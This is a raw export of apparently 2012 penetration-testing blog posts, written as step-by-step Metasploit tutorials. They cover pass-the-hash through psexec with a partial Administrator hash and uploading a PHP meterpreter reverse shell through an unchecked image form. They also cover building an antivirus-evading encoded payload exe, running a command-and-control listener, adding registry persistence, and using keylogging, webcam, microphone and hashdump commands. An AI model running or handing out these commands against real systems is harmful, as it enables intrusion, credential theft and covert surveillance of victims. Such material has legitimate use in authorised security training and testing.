/>In case you are wondering, I ended up having a nice phone conversation with the company's Director of IT, and after hyperventilating for a few moments, he assured me that all their resources would be focused on taking care of this issue immediately.<br /><br /><br />Now, at this point you may be asking yourself, "It can't really be THAT EASY to find sensitive data with google, can it?"<br />Well, yes... yes it can.<br /><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhS1SEZUKR-A4BWCHRqkzQtie3itVuHfNKXl2mxD-qfh8iNpnefc2iCtbRk0R6t5DHl-jR1Wjca6CfoAE_HwFubiyMSORRX70iZ0aYqLiwiWv5Bb7SIYePkK2QOjoV5PBBhx-wgYLEb0s/s1600/ssn.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 175px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhS1SEZUKR-A4BWCHRqkzQtie3itVuHfNKXl2mxD-qfh8iNpnefc2iCtbRk0R6t5DHl-jR1Wjca6CfoAE_HwFubiyMSORRX70iZ0aYqLiwiWv5Bb7SIYePkK2QOjoV5PBBhx-wgYLEb0s/s400/ssn.jpg" alt="" id="BLOGGER_PHOTO_ID_5727971956165401970" border="0" /></a>Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com8tag:blogger.com,1999:blog-42523487468331557.post-85139434964047657222012-04-04T09:40:00.006-07:002012-04-04T10:52:17.616-07:00Passing-The-HashTo me there are few things as elegant as a nice pass-the-hash attack. This should drive home to each of us the risk associated with sharing passwords between systems, especially ones of different security requirements.<br />With Pass-the-hash, a simple un-cracked hash can be used to compromise other systems using the same account.<br /><br /><br />How it works:<br />Once we gain root access to a system, one of the first things we do is grab password hashes, (demonstrated in a previous post), and we typically immediately jump to cracking these hashes. BUT, even an un-cracked hash can be useful. If other systems use the same credentials, we can simply pass the hash along to that system and it will happily accept it and execute code for us.<br /><br />One method for accomplishing this task is to use the Windows Credential Editor (wce). Written by Hernan Ochoa, it is available from www.ampliasecurity.com/research.html<br />This tool essentially allows you to edit the memory space of the running LSASS process, replacing your credentials with your victim's username and hash. You can then interact with other systems using any built in windows tool (net use, reg, psexec), and you'll effectively impersonate the victim.<br />***Newer versions of the tool even allow you to use stolen Kerberos tokens (with the -k and -K options).<br /><br />Now, there is a simpler method for doing a pass-the-hash attack. Since version 3.1, metasploit has a built in method for it in the psexec exploit. It is VERY EASY, as I'll demonstrate.<br /><br />We're going to use a hash we've gained from target1 (old vulnerable Windows server), to gain access to target2 (windows XPsp3, fully patched).<br /><br />First, we dump target1 hashes using the hashdump command, and we copy off Administrator's hash.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptFldaeqz0xq1dDADN1clBD_erv18Eti1yvRTK1L7VsjXRhe1TlISR1rhv_6KpKFd504VgYKHLeRGaommgsZMKSHiaePTJ03d4A5KmNIyav-Cv8TRQAlrMuU0qMzBFnvE-i3auWOWw3w/s1600/pth1.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 167px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhptFldaeqz0xq1dDADN1clBD_erv18Eti1yvRTK1L7VsjXRhe1TlISR1rhv_6KpKFd504VgYKHLeRGaommgsZMKSHiaePTJ03d4A5KmNIyav-Cv8TRQAlrMuU0qMzBFnvE-i3auWOWw3w/s400/pth1.jpg" alt="" id="BLOGGER_PHOTO_ID_5727596678909981906" border="0" /></a><br /><br /><br />Now we start up msfconsole.<br />The exploit we want is psexec, and for a payload we will use a reverse meterpreter shell, so we issue these commands:<br /><blockquote>use windows/smb/psexec<br />set PAYLOAD windows/meterpreter/reverse_tcp</blockquote>We then set the variables for RHOST (target#2's IP) and LHOST (our IP).<br /><blockquote>set RHOST "target2 IP"<br />set LHOST "Our IP"</blockquote><br />Now comes the magic. We set the user and password variables. Metasploit will automatically recognize if a hash is used for SMBPass and will use pass-the-hash rather than a password attempt.<br /><blockquote>set SMBUser Administrator<br />set SMBPass 73a87bf2afc9ca49b69e407095566351:1c31f...<br /></blockquote>That's it, run "exploit".<br /><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioNtywxzUu72tws9MfGS67v1cRjteUVdwguL0DGowR1QFI5Vf9LhcMSFXyuw6RuKQY6hsSgt-0k0QoFsVmW_lqX1sRvkcfdT2wBcQLNI24mHiESCUvhd38VeeBHh3_Y9dSXDtJy9KvgRk/s1600/pth2.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 325px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioNtywxzUu72tws9MfGS67v1cRjteUVdwguL0DGowR1QFI5Vf9LhcMSFXyuw6RuKQY6hsSgt-0k0QoFsVmW_lqX1sRvkcfdT2wBcQLNI24mHiESCUvhd38VeeBHh3_Y9dSXDtJy9KvgRk/s400/pth2.jpg" alt="" id="BLOGGER_PHOTO_ID_5727598792554066482" border="0" /></a><br /><br />As you can see, this set up the reverse handler, connected to port 445 on target2, and using the hash we supplied it was able to execute our payload, giving us a meterpreter shell.<br /><br />Because of one unmanaged legacy system, we were able to thoroughly own a completely patched box.Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com7tag:blogger.com,1999:blog-42523487468331557.post-86006344717137191522012-04-03T13:11:00.008-07:002012-04-04T13:03:36.644-07:00Deploying payload via PHPAnother fun way to deploy our meterpreter payload is with php.<br /><br />Many webservers allow file uploads for things like image files to be displayed on the page. If the upload form neglects to verify the filetype this can allow us to upload a php file including our payload, and then trick the server into executing it. Alternatively, this payload could be injected into a forum post or some such thing.<br /><br />First thing we do, is start up a meterpreter handler using the PHP method, like this:<br />/opt/metasploit-4.2.0/app/msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost="LISTENER IP" lport="PORT" ExitOnSession=false J<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPviRDEXEuyzIv2YPnbI9taKbvtf4RG-1384SxTxn0VIN0BKfrya013rPcfiXhJza3rP1XENsR6axCsWSILEwb5CLXK9-kbM6rNdj_HHfB3jf1-_CkBLZo-kjCajKtFoQuDsnyDnTbXA/s1600/php1.jpg"><img style="cursor: pointer; width: 467px; height: 293px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcPviRDEXEuyzIv2YPnbI9taKbvtf4RG-1384SxTxn0VIN0BKfrya013rPcfiXhJza3rP1XENsR6axCsWSILEwb5CLXK9-kbM6rNdj_HHfB3jf1-_CkBLZo-kjCajKtFoQuDsnyDnTbXA/s400/php1.jpg" alt="" id="BLOGGER_PHOTO_ID_5727269948952294466" border="0" /></a><br /><br />Now we create our meterpreter php payload file. This command will create the php payload, and save it as m.php<br />/opt/metasploit-4.2.0/app/msfpayload php/meterpreter/reverse_tcp LHOST="LISTENER IP" LPORT="PORT" R > ~/m.php<br /><br /><br /><br />Now we simply upload our php script like we would with an image file.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1phEj1v5o1wWWPOjqoCZyW9bCjhZM4jTqHUujH4Bvd6yr9t7N33u9qJ9BhxP8dMg6KV_2uzMe_UoFrx2qsMPeEtdxXQ2Td1ubPOvr5d06YXgn8HEyJuykCKGuzEOi1QyLbvz5a-dNXgw/s1600/php4.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 268px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1phEj1v5o1wWWPOjqoCZyW9bCjhZM4jTqHUujH4Bvd6yr9t7N33u9qJ9BhxP8dMg6KV_2uzMe_UoFrx2qsMPeEtdxXQ2Td1ubPOvr5d06YXgn8HEyJuykCKGuzEOi1QyLbvz5a-dNXgw/s400/php4.jpg" alt="" id="BLOGGER_PHOTO_ID_5727270329814254514" border="0" /></a><br /><br /><br />Then we navigate a browser to the location that server usually hosts images, and click on the file we just uploaded.<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD4AN-APE_6MdAC3b_c0o1xOvgHhJdyDO0Vc52WGEvCKgNX9GyGPF3b7pChcRd7TE38dvFT194-m0fSCtIayCekNb44tbslRB5TPmfY4ss2XMXgp2XAM8SdKT6PXLhkwwa7pqVkiJVR54/s1600/php5.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiD4AN-APE_6MdAC3b_c0o1xOvgHhJdyDO0Vc52WGEvCKgNX9GyGPF3b7pChcRd7TE38dvFT194-m0fSCtIayCekNb44tbslRB5TPmfY4ss2XMXgp2XAM8SdKT6PXLhkwwa7pqVkiJVR54/s400/php5.jpg" alt="" id="BLOGGER_PHOTO_ID_5727270487054538434" border="0" /></a><br /><br />The server runs our m.php, causing the server to connect to our meterpreter handler on the specified port, and give us a shell on the target server. In this case, the process is running as the apache user.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv5Oa-lw4VhHTx-fHN8ZuDkfZC2v7W-ZSZHi_9BUCiHm608E9PRhZ4rUvUf7PBsponCjEZv7woMqq2VQ1mmD6SVxuyVkTl1knwo6_0kcJA6rfDFHe0m8u3qZ4OrUyZHVoMQj26wCbaej4/s1600/php3.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 229px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiv5Oa-lw4VhHTx-fHN8ZuDkfZC2v7W-ZSZHi_9BUCiHm608E9PRhZ4rUvUf7PBsponCjEZv7woMqq2VQ1mmD6SVxuyVkTl1knwo6_0kcJA6rfDFHe0m8u3qZ4OrUyZHVoMQj26wCbaej4/s400/php3.jpg" alt="" id="BLOGGER_PHOTO_ID_5727638655275144450" border="0" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwd7llaE8Dv_g1CAuBpiAuEu1QInE-qejCvA9Nva-MlbALZgmS2l74HGbVR22HQe6OoXDRylXxFI7FX5N6n30jXhJcOyLw4EmE6T8uiZ1i-wCUVvDLH92WJaz4DiKTlU6K-jEQrYbStw8/s1600/php3.jpg"></a><br /><br />We can now attempt to escalate privileges to gain root/SYSTEM, or we can just look around to see what all we've actually gained access to. Chances are that we have database or other files on this system that apache can access, or perhaps we'll just want to pivot through this target to attack something more sensitive behind the firewall that's not directly accessible from the outside world.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_cV6omkBUGmCqqI50APlqOOcigOa4AELL7BcOcuNWPTfOUutdcZ0Egj0Wqm-5liR0lQh8EjJL5haSo2vu7PMPsvuh0omp2KfNvpyqunILE5ek858MPXcF6Ph9BHDo8R8zym1ubO1tzY/s1600/php6.jpg"><img style="cursor: pointer; width: 512px; height: 196px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK_cV6omkBUGmCqqI50APlqOOcigOa4AELL7BcOcuNWPTfOUutdcZ0Egj0Wqm-5liR0lQh8EjJL5haSo2vu7PMPsvuh0omp2KfNvpyqunILE5ek858MPXcF6Ph9BHDo8R8zym1ubO1tzY/s400/php6.jpg" alt="" id="BLOGGER_PHOTO_ID_5727303179393362242" border="0" /></a>Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com48tag:blogger.com,1999:blog-42523487468331557.post-41320857696782092962012-03-30T14:38:00.014-07:002012-03-30T16:09:33.983-07:00Post Exploitation ControlOnce you've gained access to a box, there are many options for "post-exploitation" control. Our main goals at that point in the game are:<br /><ul><li>Continued control- You don't want to lose control after a reboot or whatnot.</li><li>Control flexibility- A control method that allows us to interact with the system however we want...shell, gui, etc</li><li>Facilitate privilege escalation- If we only have user level access, we want a control method that facilitates efforts to gain SYSTEM/root</li><li>Facilitate pivoting- An easy platform for attacking other systems through our compromised host.</li><li>Evading detection- We don't want logs/IDS/anti-virus to cause us any issues.</li></ul><br />A good control method that meets these goals relatively well, is to use meterpreter, in a persistent fashion.<br /><br />The rest of the post will be a quick demo on:<br /><ol><li>Creating a meterpreter payload exe</li><li>Setting up a command and control handler</li><li>Making the target systems persistent so the machine stays owned</li><li>A few useful meterpreter commands.</li></ol><br /><br />1) Creating a meterpreter payload exe<br />First we download metasploit from <a href="http://www.metasploit.com/download/">http://www.metasploit.com/download/</a> and install it, I'll use version 4.2. You'll also need the ruby and ruby-gems packages installed.<br />First order of business is to create a stand alone meterpreter exe that when executed will connect back to a meterpreter listener, which we'll set up later. This is done with the msfpayload utility, and then passed through msfencode to make it harder for IDS and anti-virus to detect. We are going to encode our payload into a known good exe, so I download pslist.exe from sysinternals to use for that. You can play around with other executables, your mileage may vary.<br />This is the command I use to create my payload (replace the info in quotes). Its detected by about half of the AV vendors... still working on that.<br /><blockquote>/opt/metasploit-4.2.0/app/msfpayload windows/meterpreter/reverse_tcp LHOST=<ip of="" our="" listener="">"LISTENER IP" LPORT="<port of="" our="" listener="">LISTENER PORT" R | /opt/metasploit-4.2.0/app/msfencode -t exe ~/pslist.exe -o /root/payload.exe -e x86/shikata_ga_nai -c 10 </port></ip></blockquote><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0mWtdyb6FWpEER9lsYDGirVaDdaI5a34LCPsV8gN2lNmI29PtkZqvuMF8iyP3OO6bFl7uM__47CNyA47S4zyca05NqcltzfJrrwyWlyJ3jWZMVPsAUBDbE_24IeZeS1HIv1RuSZbQJA/s1600/makepayload.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 159px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgk0mWtdyb6FWpEER9lsYDGirVaDdaI5a34LCPsV8gN2lNmI29PtkZqvuMF8iyP3OO6bFl7uM__47CNyA47S4zyca05NqcltzfJrrwyWlyJ3jWZMVPsAUBDbE_24IeZeS1HIv1RuSZbQJA/s400/makepayload.jpg" alt="" id="BLOGGER_PHOTO_ID_5725807958064389442" border="0" /></a><br />This creates our metasploit payload and encodes it with the Shikata ga nai method 10 times, outputting the final product to /root/payload.exe<br />The payload will connect to our handler (which we will set up in a second) and give us a meterpreter shell on the target.<br /><br /><br />2) Setting up a command and control handler<br />Now let's set up a persistent metasploit handler on a machine out on the internet, so our pwned targets have a place to call home to.<br /><br />Note: If using a previous version of metasploit, you can edit the msfcli script to add in the -J (Execute the selected module as a background job) functionality that we're going to use. Instructions for adding that functionality can be found at:<br /><a href="http://forum.intern0t.org/offensive-guides-information/3440-meterpreter-handler-persisent-connections.html">http://forum.intern0t.org/offensive-guides-information/3440-meterpreter-handler-persisent-connections.html</a><br /><br />To start up a listener we use the msfcli command like this:<br /><blockquote>/opt/metasploit-4.2.0/app/msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost="LISTENER IP"<listener ip=""> lport=<listener port="">"LISTENER PORT" ExitOnSession=false J</listener></listener></blockquote><br />And we're ready to accept connections.<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSVSPpRURBMln2PS-4gTwirqJdKkDTGRzIm0nXRqDKkyd-DehSpK9fbXpkhaaITWFN2mxEEOmOGyqn7s3VO2h-RDGBhxdBOhf-5_Oc9SJpcPD-KV190H7ggZuP9v8GKBzlFP-UDQM-Xk/s1600/starthandler3.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 346px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcSVSPpRURBMln2PS-4gTwirqJdKkDTGRzIm0nXRqDKkyd-DehSpK9fbXpkhaaITWFN2mxEEOmOGyqn7s3VO2h-RDGBhxdBOhf-5_Oc9SJpcPD-KV190H7ggZuP9v8GKBzlFP-UDQM-Xk/s400/starthandler3.jpg" alt="" id="BLOGGER_PHOTO_ID_5725812633939020146" border="0" /></a><br /><br />When a target executes our payload, we'll see the handler take the connection and start a meterpreter session with it. You can see any established sessions with the command "sessions -l". You can then interact with any session by running "sessions -i (sessionId)".<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBFFeqwo5T9RFm00tiE2YbKVY1qsfqtBOvyEYfBn_TyIC1PGEg3PJHM3PC0lztKQb0hof6UCigW4UTuZwle8sJSxvb1KcNVReWrfUrwzUvVh_3_v30Wz6mX9zEyunus5VWAaGakePv0bE/s1600/sessions.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 126px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBFFeqwo5T9RFm00tiE2YbKVY1qsfqtBOvyEYfBn_TyIC1PGEg3PJHM3PC0lztKQb0hof6UCigW4UTuZwle8sJSxvb1KcNVReWrfUrwzUvVh_3_v30Wz6mX9zEyunus5VWAaGakePv0bE/s400/sessions.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808278834436626" border="0" /></a><br /><br /><br />3) Making the target systems persistent, so the machine stays owned<br />Connect to a session with "sessions -i (sessionId)". Now you can make the system to automatically reconnect every 5 seconds in the event you lose connection to it, by issuing this command:<br /><blockquote>run persistence -U -i 5 -p "LISTENER PORT"<port of="" our="" listener=""> -r "LISTENER IP"<ip of="" our="" listener=""></ip></port></blockquote><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2T0752i_v1cu0dluGiLNBt1Azsa4w7NGJOlx8cU361rw2o5ew0pBSyndKkOw-1hnpyBTwv1QSVEqyc9CIIOHBC0nq1oBSM21G03d8kR_5340Q69FZAKufAAGYqxFTp8nTfRsS3x0DAR8/s1600/persistence.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 93px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2T0752i_v1cu0dluGiLNBt1Azsa4w7NGJOlx8cU361rw2o5ew0pBSyndKkOw-1hnpyBTwv1QSVEqyc9CIIOHBC0nq1oBSM21G03d8kR_5340Q69FZAKufAAGYqxFTp8nTfRsS3x0DAR8/s400/persistence.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808771881654402" border="0" /></a><br /><br />It converts the payload to a vbs file which it calls from the registry. Now if your victim reboots or moves or you restart your handler, they will just connect back in as soon as they can.<br /><br /><br />4) A few useful meterpreter commands<br />Now on to meterpreter commands. There is no way I could list all the usages of Meterpreter, but here's some of the quick ones you'll want to know.<br /><ul><li>getuid- shows the account you are executing under.</li><li>getsystem- This uses a variety of methods to try to escalate privileges, if you're lucky it'll get you "NT AUTHORITY\SYSTEM".</li><li>hashdump- Dumps the password hashes, as you'd expect.</li></ul><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLx_1clmWcjzglHazNn54QfYCxr1n9VkaSXjuhuX_l7JjqJW_FJ0cryQqxtLlqjstnZRAOEVqTipDMRDiNwcQt5IF7Ucxbj17BaDZZV4ZwZcNq-FYiSMD4e7hqqJuj6rfTeB-6ueHyqz8/s1600/meterpreter1.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 126px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLx_1clmWcjzglHazNn54QfYCxr1n9VkaSXjuhuX_l7JjqJW_FJ0cryQqxtLlqjstnZRAOEVqTipDMRDiNwcQt5IF7Ucxbj17BaDZZV4ZwZcNq-FYiSMD4e7hqqJuj6rfTeB-6ueHyqz8/s400/meterpreter1.jpg" alt="" id="BLOGGER_PHOTO_ID_5725808172159864514" border="0" /></a><br />These hashes can be cracked or used in a pass-the-hash attack, which we'll probably cover in a future post.<br /><br /><ul><li>getpid- Gets your current process' pid</li><li>migrate- Moves the meterpreter service, and injects it into another process</li></ul><br />Here's an example of migrating over to the LSASS process<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtvHA7WkvIHgYyp8SDJ-BJCBxHUkRnMMSxPvjyM8tM4CJIiJ9lfiicHhjNI8uSvaUHuU3P84pgw8cwnUCOG72HrNn4ggNoUkTMa9IVZCBfNByeOPtdLC33rDFrFg4bJMVHEWZsh_JPJs/s1600/migrate.jpg"><img style="cursor:pointer; cursor:hand;width: 400px; height: 314px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgMtvHA7WkvIHgYyp8SDJ-BJCBxHUkRnMMSxPvjyM8tM4CJIiJ9lfiicHhjNI8uSvaUHuU3P84pgw8cwnUCOG72HrNn4ggNoUkTMa9IVZCBfNByeOPtdLC33rDFrFg4bJMVHEWZsh_JPJs/s400/migrate.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5725819229767989826" /></a><br />Sometimes you're unable to display hashes with hashdump because of process controls that only allow certain processes to access hashes. Simply migrating to another process such as LSASS, can allow you to bypass that control.<br /><br />More commands:<br /><ul><li>keyscan_start- Start grabbing keystrokes</li><li>keyscan_dump- View keystrokes</li><li>record_mic- Record audio from the default microphone</li><li>webcam_snap- Take a snapshot from the specified webcam</li><li>screenshot- Grab a screenshot of the users desktop</li></ul><br /><br />There's much much more you can do with meterpreter. There are built in commands for network tunnels, and for pivoting attacks on additional systems through the currently owned target, but that probably deserves its own blog entry.Joshua Dustin, CISSP, CEH, CHFI, GIAC GPEN, MasterCNE, CNE6, CLE, CLPhttp://www.blogger.com/profile/06716643637938670981noreply@blogger.com12